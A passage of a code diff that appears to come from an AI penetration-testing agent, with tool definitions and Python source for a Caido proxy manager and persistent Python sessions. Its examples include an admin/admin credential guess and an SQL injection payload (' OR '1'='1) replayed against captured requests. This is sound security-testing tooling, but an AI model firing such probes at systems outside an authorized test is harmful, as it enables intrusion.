<parameter=search_pattern>/api/[a-zA-Z0-9._/-]+</parameter>
</function>
</examples>
</tool>
<tool name="send_request">
<description>Send a simple HTTP request through proxy.</description>
<parameters>
<parameter name="method" type="string" required="true">
<description>HTTP method (GET, POST, etc.)</description>
</parameter>
<parameter name="url" type="string" required="true">
<description>Target URL</description>
</parameter>
<parameter name="headers" type="dict" required="false">
<description>Headers as {"key": "value"}</description>
</parameter>
<parameter name="body" type="string" required="false">
<description>Request body</description>
</parameter>
<parameter name="timeout" type="integer" required="false">
<description>Request timeout</description>
</parameter>
</parameters>
</tool>
<tool name="repeat_request">
<description>Repeat an existing proxy request with modifications for pentesting.
PROPER WORKFLOW:
1. Use browser_action to browse the target application
2. Use list_requests() to see captured proxy traffic
3. Use repeat_request() to modify and test specific requests
This mirrors real pentesting: browse → capture → modify → test</description>
<parameters>
<parameter name="request_id" type="string" required="true">
<description>ID of the original request to repeat (from list_requests)</description>
</parameter>
<parameter name="modifications" type="dict" required="false">
<description>Changes to apply to the original request:
- "url": New URL or modify existing one
- "params": Dict to update query parameters
- "headers": Dict to add/update headers
- "body": New request body (replaces original)
- "cookies": Dict to add/update cookies</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response data with status, headers, body, timing, and request details</description>
</returns>
<examples>
# Modify POST body payload
<function=repeat_request>
<parameter=request_id>req_789</parameter>
<parameter=modifications>{"body": "{\"username\":\"admin\",\"password\":\"admin\"}"}</parameter>
</function>
</examples>
</tool>
<tool name="scope_rules">
<description>Manage proxy scope patterns for domain/file filtering using Caido's scope system.</description>
<parameters>
<parameter name="action" type="string" required="true">
<description>Scope action:
- get: Get specific scope by ID or list all if no ID
- update: Update existing scope (requires scope_id and scope_name)
- list: List all available scopes
- create: Create new scope (requires scope_name)
- delete: Delete scope (requires scope_id)</description>
</parameter>
<parameter name="allowlist" type="list" required="false">
<description>Domain patterns to include. Examples: ["*.example.com", "api.test.com"]</description>
</parameter>
<parameter name="denylist" type="list" required="false">
<description>Patterns to exclude. Common static-asset extensions to filter out:
["*.gif", "*.jpg", "*.png", "*.css", "*.js", "*.ico", "*.svg", "*woff*", "*.ttf"]</description>
</parameter>
<parameter name="scope_id" type="string" required="false">
<description>Specific scope ID to operate on (required for get, update, delete)</description>
</parameter>
<parameter name="scope_name" type="string" required="false">
<description>Name for scope (required for create, update)</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Depending on action:
- get: Single scope object or error
- list: {"scopes": [...], "count": N}
- create/update: {"scope": {...}, "message": "..."}
- delete: {"message": "...", "deletedId": "..."}</description>
</returns>
<notes>
- Empty allowlist = allow all domains
- Denylist overrides allowlist
- Glob patterns: * (any), ? (single), [abc] (one of), [a-z] (range), [^abc] (none of)
- Each scope has unique ID and can be used with list_requests(scopeId=...)
</notes>
<examples>
# Create API-only scope
<function=scope_rules>
<parameter=action>create</parameter>
<parameter=scope_name>API Testing</parameter>
<parameter=allowlist>["api.example.com", "*.api.com"]</parameter>
<parameter=denylist>["*.gif", "*.jpg", "*.png", "*.css", "*.js"]</parameter>
</function>
</examples>
</tool>
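The scope semantics in the notes above (an empty allowlist allows all domains; the denylist overrides the allowlist) can be previewed locally with Python's `fnmatch`. Caido's own glob matcher is authoritative, and `fnmatch` differs on negated classes (it uses `[!abc]`, not `[^abc]`); `in_scope` is an illustrative helper, not a real API:

```python
from fnmatch import fnmatch


def in_scope(host: str, allowlist: list[str], denylist: list[str]) -> bool:
    """Approximate a scope check: denylist wins, empty allowlist allows all."""
    if any(fnmatch(host, pattern) for pattern in denylist):
        return False
    return not allowlist or any(fnmatch(host, pattern) for pattern in allowlist)
```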
<tool name="list_sitemap">
<description>View hierarchical sitemap of discovered attack surface from proxied traffic.
Perfect for bug hunters to understand the application structure and identify
interesting endpoints, directories, and entry points discovered during testing.</description>
<parameters>
<parameter name="scope_id" type="string" required="false">
<description>Scope ID to filter sitemap entries (use scope_rules to get/create scope IDs)</description>
</parameter>
<parameter name="parent_id" type="string" required="false">
<description>ID of parent entry to expand. If None, returns root domains.</description>
</parameter>
<parameter name="depth" type="string" required="false">
<description>DIRECT: Only immediate children. ALL: All descendants recursively.</description>
</parameter>
<parameter name="page" type="integer" required="false">
<description>Page number for pagination (30 entries per page)</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing:
- 'entries': List of cleaned sitemap entries
- 'page', 'total_pages', 'total_count': Pagination info
- 'has_more': Whether more pages available
- Each entry: id, kind, label, hasDescendants, request (method/path/status only)</description>
</returns>
<notes>
Entry kinds:
- DOMAIN: Root domains (example.com)
- DIRECTORY: Path directories (/api/, /admin/)
- REQUEST: Individual endpoints
- REQUEST_BODY: POST/PUT body variations
- REQUEST_QUERY: GET parameter variations
Check hasDescendants=true to identify entries worth expanding.
Use parent_id from any entry to drill down into subdirectories.
</notes>
</tool>
<tool name="view_sitemap_entry">
<description>Get detailed information about a specific sitemap entry and related requests.
Perfect for understanding what's been discovered under a specific directory
or endpoint, including all related requests and response codes.</description>
<parameters>
<parameter name="entry_id" type="string" required="true">
<description>ID of the sitemap entry to examine</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing:
- 'entry': Complete entry details including metadata
- Entry contains 'requests' with all related HTTP requests
- Shows request methods, paths, response codes, timing</description>
</returns>
</tool>
</tools>
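The paging parameters that several of these tools share (start_page, end_page, page_size) reduce to a single offset/limit window for the underlying query. A minimal sketch of that arithmetic, with `page_window` as a hypothetical name:

```python
def page_window(start_page: int, end_page: int, page_size: int) -> tuple[int, int]:
    """Translate a 1-indexed page range into an offset/limit pair.

    The offset skips every page before start_page; the limit covers
    the pages start_page through end_page inclusive.
    """
    offset = (start_page - 1) * page_size
    limit = (end_page - start_page + 1) * page_size
    return offset, limit
```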

View File

@@ -0,0 +1,785 @@
import base64
import os
import re
import time
from typing import TYPE_CHECKING, Any
from urllib.parse import parse_qs, urlencode, urlparse, urlunparse
import requests
from gql import Client, gql
from gql.transport.exceptions import TransportQueryError
from gql.transport.requests import RequestsHTTPTransport
from requests.exceptions import ProxyError, RequestException, Timeout
if TYPE_CHECKING:
from collections.abc import Callable
class ProxyManager:
def __init__(self, auth_token: str | None = None):
host = "127.0.0.1"
port = os.getenv("CAIDO_PORT", "56789")
self.base_url = f"http://{host}:{port}/graphql"
self.proxies = {"http": f"http://{host}:{port}", "https": f"http://{host}:{port}"}
self.auth_token = auth_token or os.getenv("CAIDO_API_TOKEN")
self.transport = RequestsHTTPTransport(
url=self.base_url, headers={"Authorization": f"Bearer {self.auth_token}"}
)
self.client = Client(transport=self.transport, fetch_schema_from_transport=False)
def list_requests(
self,
httpql_filter: str | None = None,
start_page: int = 1,
end_page: int = 1,
page_size: int = 50,
sort_by: str = "timestamp",
sort_order: str = "desc",
scope_id: str | None = None,
) -> dict[str, Any]:
offset = (start_page - 1) * page_size
limit = (end_page - start_page + 1) * page_size
sort_mapping = {
"timestamp": "CREATED_AT",
"host": "HOST",
"method": "METHOD",
"path": "PATH",
"status_code": "RESP_STATUS_CODE",
"response_time": "RESP_ROUNDTRIP_TIME",
"response_size": "RESP_LENGTH",
"source": "SOURCE",
}
query = gql("""
query GetRequests(
$limit: Int, $offset: Int, $filter: HTTPQL,
$order: RequestResponseOrderInput, $scopeId: ID
) {
requestsByOffset(
limit: $limit, offset: $offset, filter: $filter,
order: $order, scopeId: $scopeId
) {
edges {
node {
id method host path query createdAt length isTls port
source alteration fileExtension
response { id statusCode length roundtripTime createdAt }
}
}
count { value }
}
}
""")
variables = {
"limit": limit,
"offset": offset,
"filter": httpql_filter,
"order": {
"by": sort_mapping.get(sort_by, "CREATED_AT"),
"ordering": sort_order.upper(),
},
"scopeId": scope_id,
}
try:
result = self.client.execute(query, variable_values=variables)
data = result.get("requestsByOffset", {})
nodes = [edge["node"] for edge in data.get("edges", [])]
count_data = data.get("count") or {}
return {
"requests": nodes,
"total_count": count_data.get("value", 0),
"start_page": start_page,
"end_page": end_page,
"page_size": page_size,
"offset": offset,
"returned_count": len(nodes),
"sort_by": sort_by,
"sort_order": sort_order,
}
except (TransportQueryError, ValueError, KeyError) as e:
return {"requests": [], "total_count": 0, "error": f"Error fetching requests: {e}"}
def view_request(
self,
request_id: str,
part: str = "request",
search_pattern: str | None = None,
page: int = 1,
page_size: int = 50,
) -> dict[str, Any]:
queries = {
"request": """query GetRequest($id: ID!) {
request(id: $id) {
id method host path query createdAt length isTls port
source alteration edited raw
}
}""",
"response": """query GetRequest($id: ID!) {
request(id: $id) {
id response {
id statusCode length roundtripTime createdAt raw
}
}
}""",
}
if part not in queries:
return {"error": f"Invalid part '{part}'. Use 'request' or 'response'"}
try:
result = self.client.execute(gql(queries[part]), variable_values={"id": request_id})
request_data = result.get("request", {})
if not request_data:
return {"error": f"Request {request_id} not found"}
if part == "request":
raw_content = request_data.get("raw")
else:
response_data = request_data.get("response") or {}
raw_content = response_data.get("raw")
if not raw_content:
return {"error": "No content available"}
content = base64.b64decode(raw_content).decode("utf-8", errors="replace")
if part == "response":
request_data["response"]["raw"] = content
else:
request_data["raw"] = content
return (
self._search_content(request_data, content, search_pattern)
if search_pattern
else self._paginate_content(request_data, content, page, page_size)
)
except (TransportQueryError, ValueError, KeyError, UnicodeDecodeError) as e:
return {"error": f"Failed to view request: {e}"}
def _search_content(
self, request_data: dict[str, Any], content: str, pattern: str
) -> dict[str, Any]:
try:
regex = re.compile(pattern, re.IGNORECASE | re.MULTILINE | re.DOTALL)
matches = []
for match in regex.finditer(content):
start, end = match.start(), match.end()
context_size = 120
before = re.sub(r"\s+", " ", content[max(0, start - context_size) : start].strip())[
-100:
]
after = re.sub(r"\s+", " ", content[end : end + context_size].strip())[:100]
matches.append(
{"match": match.group(), "before": before, "after": after, "position": start}
)
if len(matches) >= 20:
break
return {
"id": request_data.get("id"),
"matches": matches,
"total_matches": len(matches),
"search_pattern": pattern,
"truncated": len(matches) >= 20,
}
except re.error as e:
return {"error": f"Invalid regex: {e}"}
def _paginate_content(
self, request_data: dict[str, Any], content: str, page: int, page_size: int
) -> dict[str, Any]:
display_lines = []
for line in content.split("\n"):
if len(line) <= 80:
display_lines.append(line)
else:
display_lines.extend(
[
line[i : i + 80] + (" \\" if i + 80 < len(line) else "")
for i in range(0, len(line), 80)
]
)
total_lines = len(display_lines)
total_pages = (total_lines + page_size - 1) // page_size
page = max(1, min(page, total_pages))
start_line = (page - 1) * page_size
end_line = min(total_lines, start_line + page_size)
return {
"id": request_data.get("id"),
"content": "\n".join(display_lines[start_line:end_line]),
"page": page,
"total_pages": total_pages,
"showing_lines": f"{start_line + 1}-{end_line} of {total_lines}",
"has_more": page < total_pages,
}
def send_simple_request(
self,
method: str,
url: str,
headers: dict[str, str] | None = None,
body: str = "",
timeout: int = 30,
) -> dict[str, Any]:
if headers is None:
headers = {}
try:
start_time = time.time()
response = requests.request(
method=method,
url=url,
headers=headers,
data=body or None,
proxies=self.proxies,
timeout=timeout,
verify=False,
)
response_time = int((time.time() - start_time) * 1000)
body_content = response.text
if len(body_content) > 10000:
body_content = body_content[:10000] + "\n... [truncated]"
return {
"status_code": response.status_code,
"headers": dict(response.headers),
"body": body_content,
"response_time_ms": response_time,
"url": response.url,
"message": (
"Request sent through proxy - check list_requests() for captured traffic"
),
}
except (RequestException, ProxyError, Timeout) as e:
return {"error": f"Request failed: {type(e).__name__}", "details": str(e), "url": url}
def repeat_request(
self, request_id: str, modifications: dict[str, Any] | None = None
) -> dict[str, Any]:
if modifications is None:
modifications = {}
original = self.view_request(request_id, "request")
if "error" in original:
return {"error": f"Could not retrieve original request: {original['error']}"}
raw_content = original.get("content", "")
if not raw_content:
return {"error": "No raw request content found"}
request_components = self._parse_http_request(raw_content)
if "error" in request_components:
return request_components
full_url = self._build_full_url(request_components, modifications)
if "error" in full_url:
return full_url
modified_request = self._apply_modifications(
request_components, modifications, full_url["url"]
)
return self._send_modified_request(modified_request, request_id, modifications)
def _parse_http_request(self, raw_content: str) -> dict[str, Any]:
lines = raw_content.split("\n")
request_line = lines[0].strip().split(" ")
if len(request_line) < 2:
return {"error": "Invalid request line format"}
method, url_path = request_line[0], request_line[1]
headers = {}
body_start = 0
for i, line in enumerate(lines[1:], 1):
if line.strip() == "":
body_start = i + 1
break
if ":" in line:
key, value = line.split(":", 1)
headers[key.strip()] = value.strip()
body = "\n".join(lines[body_start:]).strip() if body_start < len(lines) else ""
return {"method": method, "url_path": url_path, "headers": headers, "body": body}
def _build_full_url(
self, components: dict[str, Any], modifications: dict[str, Any]
) -> dict[str, Any]:
headers = components["headers"]
host = headers.get("Host", "")
if not host:
return {"error": "No Host header found"}
protocol = (
"https" if ":443" in host or "https" in headers.get("Referer", "").lower() else "http"
)
full_url = f"{protocol}://{host}{components['url_path']}"
if "url" in modifications:
full_url = modifications["url"]
return {"url": full_url}
def _apply_modifications(
self, components: dict[str, Any], modifications: dict[str, Any], full_url: str
) -> dict[str, Any]:
headers = components["headers"].copy()
body = components["body"]
final_url = full_url
if "params" in modifications:
parsed = urlparse(final_url)
params = {k: v[0] if v else "" for k, v in parse_qs(parsed.query).items()}
params.update(modifications["params"])
final_url = urlunparse(parsed._replace(query=urlencode(params)))
if "headers" in modifications:
headers.update(modifications["headers"])
if "body" in modifications:
body = modifications["body"]
if "cookies" in modifications:
cookies = {}
if headers.get("Cookie"):
for cookie in headers["Cookie"].split(";"):
if "=" in cookie:
k, v = cookie.split("=", 1)
cookies[k.strip()] = v.strip()
cookies.update(modifications["cookies"])
headers["Cookie"] = "; ".join([f"{k}={v}" for k, v in cookies.items()])
return {
"method": components["method"],
"url": final_url,
"headers": headers,
"body": body,
}
def _send_modified_request(
self, request_data: dict[str, Any], request_id: str, modifications: dict[str, Any]
) -> dict[str, Any]:
try:
start_time = time.time()
response = requests.request(
method=request_data["method"],
url=request_data["url"],
headers=request_data["headers"],
data=request_data["body"] or None,
proxies=self.proxies,
timeout=30,
verify=False,
)
response_time = int((time.time() - start_time) * 1000)
response_body = response.text
truncated = len(response_body) > 10000
if truncated:
response_body = response_body[:10000] + "\n... [truncated]"
return {
"status_code": response.status_code,
"status_text": response.reason,
"headers": {
k: v
for k, v in response.headers.items()
if k.lower()
in ["content-type", "content-length", "server", "set-cookie", "location"]
},
"body": response_body,
"body_truncated": truncated,
"body_size": len(response.content),
"response_time_ms": response_time,
"url": response.url,
"original_request_id": request_id,
"modifications_applied": modifications,
"request": {
"method": request_data["method"],
"url": request_data["url"],
"headers": request_data["headers"],
"has_body": bool(request_data["body"]),
},
}
except ProxyError as e:
return {
"error": "Proxy connection failed - is Caido running?",
"details": str(e),
"original_request_id": request_id,
}
except (RequestException, Timeout) as e:
return {
"error": f"Failed to repeat request: {type(e).__name__}",
"details": str(e),
"original_request_id": request_id,
}
def _handle_scope_list(self) -> dict[str, Any]:
result = self.client.execute(gql("query { scopes { id name allowlist denylist indexed } }"))
scopes = result.get("scopes", [])
return {"scopes": scopes, "count": len(scopes)}
def _handle_scope_get(self, scope_id: str | None) -> dict[str, Any]:
if not scope_id:
return self._handle_scope_list()
result = self.client.execute(
gql(
"query GetScope($id: ID!) { scope(id: $id) { id name allowlist denylist indexed } }"
),
variable_values={"id": scope_id},
)
scope = result.get("scope")
if not scope:
return {"error": f"Scope {scope_id} not found"}
return {"scope": scope}
def _handle_scope_create(
self, scope_name: str, allowlist: list[str] | None, denylist: list[str] | None
) -> dict[str, Any]:
if not scope_name:
return {"error": "scope_name required for create"}
mutation = gql("""
mutation CreateScope($input: CreateScopeInput!) {
createScope(input: $input) {
scope { id name allowlist denylist indexed }
error {
... on InvalidGlobTermsUserError { code terms }
... on OtherUserError { code }
}
}
}
""")
result = self.client.execute(
mutation,
variable_values={
"input": {
"name": scope_name,
"allowlist": allowlist or [],
"denylist": denylist or [],
}
},
)
payload = result.get("createScope", {})
if payload.get("error"):
error = payload["error"]
return {"error": f"Invalid glob patterns: {error.get('terms', error.get('code'))}"}
return {"scope": payload.get("scope"), "message": "Scope created successfully"}
def _handle_scope_update(
self,
scope_id: str,
scope_name: str,
allowlist: list[str] | None,
denylist: list[str] | None,
) -> dict[str, Any]:
if not scope_id or not scope_name:
return {"error": "scope_id and scope_name required"}
mutation = gql("""
mutation UpdateScope($id: ID!, $input: UpdateScopeInput!) {
updateScope(id: $id, input: $input) {
scope { id name allowlist denylist indexed }
error {
... on InvalidGlobTermsUserError { code terms }
... on OtherUserError { code }
}
}
}
""")
result = self.client.execute(
mutation,
variable_values={
"id": scope_id,
"input": {
"name": scope_name,
"allowlist": allowlist or [],
"denylist": denylist or [],
},
},
)
payload = result.get("updateScope", {})
if payload.get("error"):
error = payload["error"]
return {"error": f"Invalid glob patterns: {error.get('terms', error.get('code'))}"}
return {"scope": payload.get("scope"), "message": "Scope updated successfully"}
def _handle_scope_delete(self, scope_id: str) -> dict[str, Any]:
if not scope_id:
return {"error": "scope_id required for delete"}
result = self.client.execute(
gql("mutation DeleteScope($id: ID!) { deleteScope(id: $id) { deletedId } }"),
variable_values={"id": scope_id},
)
payload = result.get("deleteScope", {})
if not payload.get("deletedId"):
return {"error": f"Failed to delete scope {scope_id}"}
return {"message": f"Scope {scope_id} deleted", "deletedId": payload["deletedId"]}
def scope_rules(
self,
action: str,
allowlist: list[str] | None = None,
denylist: list[str] | None = None,
scope_id: str | None = None,
scope_name: str | None = None,
) -> dict[str, Any]:
handlers: dict[str, Callable[[], dict[str, Any]]] = {
"list": self._handle_scope_list,
"get": lambda: self._handle_scope_get(scope_id),
"create": lambda: (
{"error": "scope_name required for create"}
if not scope_name
else self._handle_scope_create(scope_name, allowlist, denylist)
),
"update": lambda: (
{"error": "scope_id and scope_name required"}
if not scope_id or not scope_name
else self._handle_scope_update(scope_id, scope_name, allowlist, denylist)
),
"delete": lambda: (
{"error": "scope_id required for delete"}
if not scope_id
else self._handle_scope_delete(scope_id)
),
}
handler = handlers.get(action)
if not handler:
return {
"error": f"Unsupported action: {action}. Use 'get', 'list', 'create', "
f"'update', or 'delete'"
}
try:
result = handler()
except (TransportQueryError, ValueError, KeyError) as e:
return {"error": f"Scope operation failed: {e}"}
else:
return result
def list_sitemap(
self,
scope_id: str | None = None,
parent_id: str | None = None,
depth: str = "DIRECT",
page: int = 1,
page_size: int = 30,
) -> dict[str, Any]:
try:
skip_count = (page - 1) * page_size
if parent_id:
query = gql("""
query GetSitemapDescendants($parentId: ID!, $depth: SitemapDescendantsDepth!) {
sitemapDescendantEntries(parentId: $parentId, depth: $depth) {
edges {
node {
id kind label hasDescendants
request { method path response { statusCode } }
}
}
count { value }
}
}
""")
result = self.client.execute(
query, variable_values={"parentId": parent_id, "depth": depth}
)
data = result.get("sitemapDescendantEntries", {})
else:
query = gql("""
query GetSitemapRoots($scopeId: ID) {
sitemapRootEntries(scopeId: $scopeId) {
edges { node {
id kind label hasDescendants
metadata { ... on SitemapEntryMetadataDomain { isTls port } }
request { method path response { statusCode } }
} }
count { value }
}
}
""")
result = self.client.execute(query, variable_values={"scopeId": scope_id})
data = result.get("sitemapRootEntries", {})
all_nodes = [edge["node"] for edge in data.get("edges", [])]
count_data = data.get("count") or {}
total_count = count_data.get("value", 0)
paginated_nodes = all_nodes[skip_count : skip_count + page_size]
cleaned_nodes = []
for node in paginated_nodes:
cleaned = {
"id": node["id"],
"kind": node["kind"],
"label": node["label"],
"hasDescendants": node["hasDescendants"],
}
if node.get("metadata") and (
node["metadata"].get("isTls") is not None or node["metadata"].get("port")
):
cleaned["metadata"] = node["metadata"]
if node.get("request"):
req = node["request"]
cleaned_req = {}
if req.get("method"):
cleaned_req["method"] = req["method"]
if req.get("path"):
cleaned_req["path"] = req["path"]
response_data = req.get("response") or {}
if response_data.get("statusCode"):
cleaned_req["status"] = response_data["statusCode"]
if cleaned_req:
cleaned["request"] = cleaned_req
cleaned_nodes.append(cleaned)
total_pages = (total_count + page_size - 1) // page_size
return {
"entries": cleaned_nodes,
"page": page,
"page_size": page_size,
"total_pages": total_pages,
"total_count": total_count,
"has_more": page < total_pages,
"showing": (
f"{skip_count + 1}-{min(skip_count + page_size, total_count)} of {total_count}"
),
}
except (TransportQueryError, ValueError, KeyError) as e:
return {"error": f"Failed to fetch sitemap: {e}"}
def _process_sitemap_metadata(self, node: dict[str, Any]) -> dict[str, Any]:
cleaned = {
"id": node["id"],
"kind": node["kind"],
"label": node["label"],
"hasDescendants": node["hasDescendants"],
}
if node.get("metadata") and (
node["metadata"].get("isTls") is not None or node["metadata"].get("port")
):
cleaned["metadata"] = node["metadata"]
return cleaned
def _process_sitemap_request(self, req: dict[str, Any]) -> dict[str, Any] | None:
cleaned_req = {}
if req.get("method"):
cleaned_req["method"] = req["method"]
if req.get("path"):
cleaned_req["path"] = req["path"]
response_data = req.get("response") or {}
if response_data.get("statusCode"):
cleaned_req["status"] = response_data["statusCode"]
return cleaned_req if cleaned_req else None
def _process_sitemap_response(self, resp: dict[str, Any]) -> dict[str, Any]:
cleaned_resp = {}
if resp.get("statusCode"):
cleaned_resp["status"] = resp["statusCode"]
if resp.get("length"):
cleaned_resp["size"] = resp["length"]
if resp.get("roundtripTime"):
cleaned_resp["time_ms"] = resp["roundtripTime"]
return cleaned_resp
def view_sitemap_entry(self, entry_id: str) -> dict[str, Any]:
try:
query = gql("""
query GetSitemapEntry($id: ID!) {
sitemapEntry(id: $id) {
id kind label hasDescendants
metadata { ... on SitemapEntryMetadataDomain { isTls port } }
request { method path response { statusCode length roundtripTime } }
requests(first: 30, order: {by: CREATED_AT, ordering: DESC}) {
edges { node { method path response { statusCode length } } }
count { value }
}
}
}
""")
result = self.client.execute(query, variable_values={"id": entry_id})
entry = result.get("sitemapEntry")
if not entry:
return {"error": f"Sitemap entry {entry_id} not found"}
cleaned = self._process_sitemap_metadata(entry)
if entry.get("request"):
req = entry["request"]
cleaned_req = {}
if req.get("method"):
cleaned_req["method"] = req["method"]
if req.get("path"):
cleaned_req["path"] = req["path"]
if req.get("response"):
cleaned_req["response"] = self._process_sitemap_response(req["response"])
if cleaned_req:
cleaned["request"] = cleaned_req
requests_data = entry.get("requests", {})
request_nodes = [edge["node"] for edge in requests_data.get("edges", [])]
cleaned_requests = [
req
for req in (self._process_sitemap_request(node) for node in request_nodes)
if req is not None
]
count_data = requests_data.get("count") or {}
cleaned["related_requests"] = {
"requests": cleaned_requests,
"total_count": count_data.get("value", 0),
"showing": f"Latest {len(cleaned_requests)} requests",
}
return {"entry": cleaned} if cleaned else {"error": "Failed to process sitemap entry"} # noqa: TRY300
except (TransportQueryError, ValueError, KeyError) as e:
return {"error": f"Failed to fetch sitemap entry: {e}"}
def close(self) -> None:
pass
_PROXY_MANAGER: ProxyManager | None = None
def get_proxy_manager() -> ProxyManager:
    global _PROXY_MANAGER
    # Cache the instance so repeated calls share one GraphQL client
    if _PROXY_MANAGER is None:
        _PROXY_MANAGER = ProxyManager()
    return _PROXY_MANAGER
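The "params" modification handled by `_apply_modifications` merges new query parameters over the originals without disturbing untouched ones. The core of that merge, extracted as a standalone sketch (`apply_params` is a hypothetical helper name):

```python
from urllib.parse import parse_qs, urlencode, urlparse, urlunparse


def apply_params(url: str, updates: dict[str, str]) -> str:
    """Merge query-parameter updates into a URL, keeping existing params.

    Mirrors the "params" branch: parse_qs values are flattened to single
    strings, then the updates dict overrides matching keys.
    """
    parsed = urlparse(url)
    params = {k: v[0] if v else "" for k, v in parse_qs(parsed.query).items()}
    params.update(updates)
    return urlunparse(parsed._replace(query=urlencode(params)))
```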

View File

@@ -0,0 +1,4 @@
from .python_actions import python_action
__all__ = ["python_action"]

View File

@@ -0,0 +1,47 @@
from typing import Any, Literal
from strix.tools.registry import register_tool
from .python_manager import get_python_session_manager
PythonAction = Literal["new_session", "execute", "close", "list_sessions"]
@register_tool
def python_action(
action: PythonAction,
code: str | None = None,
timeout: int = 30,
session_id: str | None = None,
) -> dict[str, Any]:
def _validate_code(action_name: str, code: str | None) -> None:
if not code:
raise ValueError(f"code parameter is required for {action_name} action")
def _validate_action(action_name: str) -> None:
raise ValueError(f"Unknown action: {action_name}")
manager = get_python_session_manager()
try:
match action:
case "new_session":
return manager.create_session(session_id, code, timeout)
case "execute":
_validate_code(action, code)
assert code is not None
return manager.execute_code(session_id, code, timeout)
case "close":
return manager.close_session(session_id)
case "list_sessions":
return manager.list_sessions()
case _:
_validate_action(action) # type: ignore[unreachable]
except (ValueError, RuntimeError) as e:
return {"stderr": str(e), "session_id": session_id, "stdout": "", "is_running": False}
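The session persistence this tool relies on comes down to reusing one namespace dict per session, which is what the manager above dispatches to. A minimal, simplified sketch of that pattern (`execute_in_session` and the module-level `_sessions` dict are illustrative, not the real session manager, which also handles timeouts and IPython magics):

```python
import contextlib
import io

_sessions: dict[str, dict] = {}


def execute_in_session(session_id: str, code: str) -> str:
    """Run code in a per-session namespace, capturing stdout.

    Variables from earlier calls stay visible because every call for the
    same session_id shares the same globals dict.
    """
    namespace = _sessions.setdefault(session_id, {})
    buffer = io.StringIO()
    with contextlib.redirect_stdout(buffer):
        exec(code, namespace)  # illustrative sketch only; no sandboxing
    return buffer.getvalue()
```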

View File

@@ -0,0 +1,131 @@
<?xml version="1.0" encoding="UTF-8"?>
<tools>
<tool name="python_action">
<description>Perform Python actions using persistent interpreter sessions for cybersecurity tasks.</description>
<details>Common Use Cases:
- Security script development and testing (payload generation, exploit scripts)
- Data analysis of security logs, network traffic, or vulnerability scans
- Cryptographic operations and security tool automation
- Interactive penetration testing workflows and proof-of-concept development
- Processing security data formats (JSON, XML, CSV from security tools)
- HTTP proxy interaction for web security testing (all proxy functions are pre-imported)
Each session instance is PERSISTENT and maintains its own global and local namespaces
until explicitly closed, allowing for multi-step security workflows and stateful computations.
PROXY FUNCTIONS PRE-IMPORTED:
All proxy action functions are automatically imported into every Python session, enabling
seamless HTTP traffic analysis and web security testing.
This is particularly useful for:
- Analyzing captured HTTP traffic during web application testing
- Automating request manipulation and replay attacks
- Building custom security testing workflows combining proxy data with Python analysis
- Correlating multiple requests for advanced attack scenarios</details>
<parameters>
<parameter name="action" type="string" required="true">
<description>The Python action to perform:
- new_session: Create a new Python interpreter session. This MUST be the first action for each session.
- execute: Execute Python code in the specified session.
- close: Close the specified session instance.
- list_sessions: List all active Python sessions.</description>
</parameter>
<parameter name="code" type="string" required="false">
<description>The Python code to execute. Required for the 'execute' action; optional initial code for 'new_session'.</description>
</parameter>
<parameter name="timeout" type="integer" required="false">
<description>Maximum execution time in seconds for code execution. Applies to both 'new_session' (when initial code is provided) and 'execute' actions. Default is 30 seconds.</description>
</parameter>
<parameter name="session_id" type="string" required="false">
<description>Unique identifier for the Python session. If not provided, uses the default session ID.</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing:
- session_id: the ID of the session that was operated on
- stdout: captured standard output from code execution (for the 'execute' action)
- stderr: any error message if execution failed
- result: string representation of the last expression result
- execution_time: time taken to execute the code
- message: status message about the action performed
- additional session info depending on the action</description>
</returns>
<notes>
Important usage rules:
1. PERSISTENCE: Session instances remain active and maintain their state (variables,
imports, function definitions) until explicitly closed with the 'close' action.
This allows for multi-step workflows across multiple tool calls.
2. MULTIPLE SESSIONS: You can run multiple Python sessions concurrently by using
different session_id values. Each session operates independently with its own
namespace.
3. Session interaction MUST begin with 'new_session' action for each session instance.
4. Only one action can be performed per call.
5. CODE EXECUTION:
- Both expressions and statements are supported
- Expressions automatically return their result
- Print statements and stdout are captured
- Variables persist between executions in the same session
- Imports, function definitions, etc. persist in the session
- IPython magic commands are fully supported (%pip, %time, %whos, %%writefile, etc.)
- Line magics (%) and cell magics (%%) work as expected
6. CLOSE: Terminates the session completely and frees memory
7. The Python sessions can operate concurrently with other tools. You may invoke
terminal, browser, or other tools while maintaining active Python sessions.
8. Each session has its own isolated namespace - variables in one session don't
affect others.
</notes>
<examples>
# Create new session for security analysis (default session)
<function=python_action>
<parameter=action>new_session</parameter>
<parameter=code>import hashlib
import base64
import json
print("Security analysis session started")</parameter>
</function>
# Analyze security data in the default session
<function=python_action>
<parameter=action>execute</parameter>
<parameter=code>vulnerability_data = {"cve": "CVE-2024-1234", "severity": "high"}
encoded_payload = base64.b64encode(json.dumps(vulnerability_data).encode())
print(f"Encoded: {encoded_payload.decode()}")</parameter>
</function>
# Long running security scan with custom timeout
<function=python_action>
<parameter=action>execute</parameter>
<parameter=code>import time
# Simulate long-running vulnerability scan
time.sleep(45)
print('Security scan completed!')</parameter>
<parameter=timeout>50</parameter>
</function>
# Use IPython magic commands for package management and profiling
<function=python_action>
<parameter=action>execute</parameter>
<parameter=code>%pip install requests
import requests
%time response = requests.get('https://httpbin.org/json')
%whos</parameter>
</function>
# Analyze requests for potential vulnerabilities
<function=python_action>
<parameter=action>execute</parameter>
<parameter=code># Filter for POST requests that might contain sensitive data
post_requests = list_requests(
httpql_filter="req.method.eq:POST",
page_size=20
)
# Analyze each POST request for potential issues
for req in post_requests.get('requests', []):
request_id = req['id']
# View the request details
request_details = view_request(request_id, part="request")
# Check for potential SQL injection points
body = request_details.get('body', '')
if any(keyword in body.lower() for keyword in ['select', 'union', 'insert', 'update']):
print(f"Potential SQL injection in request {request_id}")
# Repeat the request with a test payload
test_payload = repeat_request(request_id, {
'body': body + "' OR '1'='1"
})
print(f"Test response status: {test_payload.get('status_code')}")
print("Security analysis complete!")</parameter>
</function>
</examples>
</tool>
</tools>


@@ -0,0 +1,172 @@
import io
import signal
import sys
import threading
from typing import Any
from IPython.core.interactiveshell import InteractiveShell
MAX_STDOUT_LENGTH = 10_000
MAX_STDERR_LENGTH = 5_000
class PythonInstance:
def __init__(self, session_id: str) -> None:
self.session_id = session_id
self.is_running = True
self._execution_lock = threading.Lock()
import os
os.chdir("/workspace")
self.shell = InteractiveShell()
